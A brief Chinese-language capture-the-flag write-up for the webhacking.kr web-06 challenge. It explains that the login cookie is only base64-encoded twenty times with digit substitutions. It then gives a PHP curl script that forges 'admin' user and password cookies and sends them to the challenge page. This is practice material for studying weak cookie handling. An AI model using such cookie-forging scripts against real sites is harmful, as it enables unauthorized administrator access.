通过阅读源代码,发现只是简单地将cookie做了些字符替换,再用base64解码了20次。于是我们只需要反过来走一遍即可。大部分代码甚至可以直接用他。
<?php$val_id="admin";$val_pw="admin";for($i=0;$i<20;$i++){$val_id=base64_encode($val_id);$val_pw=base64_encode($val_pw);}$val_id=str_replace("1","!",$val_id);$val_id=str_replace("2","@",$val_id);$val_id=str_replace("3","$",$val_id);$val_id=str_replace("4","^",$val_id);$val_id=str_replace("5","&",$val_id);$val_id=str_replace("6","*",$val_id);$val_id=str_replace("7","(",$val_id);$val_id=str_replace("8",")",$val_id);$val_pw=str_replace("1","!",$val_pw);$val_pw=str_replace("2","@",$val_pw);$val_pw=str_replace("3","$",$val_pw);$val_pw=str_replace("4","^",$val_pw);$val_pw=str_replace("5","&",$val_pw);$val_pw=str_replace("6","*",$val_pw);$val_pw=str_replace("7","(",$val_pw);$val_pw=str_replace("8",")",$val_pw);$url="http://webhacking.kr/challenge/web/web-06/index.php";$ch=curl_init();$cookie="PHPSESSID=ol8a0r79n9j5ocopvd542sslq0; user=".$val_id."; password=".$val_pw;curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_COOKIE,$cookie);curl_exec($ch);curl_close($ch);?>